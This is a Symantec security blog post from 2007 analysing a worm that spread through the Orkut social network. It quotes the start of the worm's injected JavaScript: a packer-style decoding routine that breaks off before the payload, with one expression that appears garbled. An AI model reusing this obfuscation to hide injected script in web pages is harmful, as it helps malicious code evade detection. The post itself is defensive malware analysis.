Symantec Blogs: Security ResponseSyndicate content

The Orkut Worm Has Landed!
Umesh Wanve | December 20th, 2007
0 comments

Orkut is a popular social networking sitewith millions of registered users. A couple of days ago Orkut was hitwith a worm that impacted close to 700,000 users in approximately 24hours. We took a closer look at the exploit to get an idea of why somany users' systems were infected. The exploit was contained in aJavaScript file, aptly named "virus.js" file, which was injected usingan embed tag. Here is a snippet of the JavaScript file:

function $(p,a,c,k,e,d) {
 e=function(c) {
  return(c35?String.fromCharCode(c+29):c.toString(36))
};
if(!''.replace(/^/,String)){
 while(c--){d[e(c)]=k[c]||e(c)}
 k=[function(e){return d[e]}];
 e=function(){return'\\w+'};
 c=1
};
while(c--){
 if(k[c]){
  p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])
 }
 }
return p
};
setTimeout(...

Read more
Tags: Security, Security Response, Malicious Code, Endpoint Protection (AntiVirus)